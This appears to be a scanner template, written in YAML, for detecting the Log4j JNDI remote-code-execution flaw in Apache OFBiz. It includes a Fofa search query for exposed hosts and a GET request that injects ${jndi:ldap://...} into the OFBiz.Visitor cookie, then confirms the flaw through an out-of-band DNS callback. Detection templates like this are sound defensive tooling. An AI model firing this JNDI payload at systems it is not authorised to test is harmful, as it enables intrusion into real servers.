漏洞描述
Fofa: app="Apache_OFBiz"
id: apache-ofbiz-log4j-rce-temp
info:
name: Apache OFBiz Log4j JNDI RCE
author: pdteam
severity: critical
verified: true
description: |
Fofa: app="Apache_OFBiz"
tags: apache,ofbiz,log4j,rce,jndi
created: 2023/07/02
set:
oob: oob()
oobDNS: oob.DNS
rules:
r0:
request:
method: GET
path: /webtools/control/main
headers:
Cookie: OFBiz.Visitor=${jndi:ldap://{{oobDNS}}}
expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()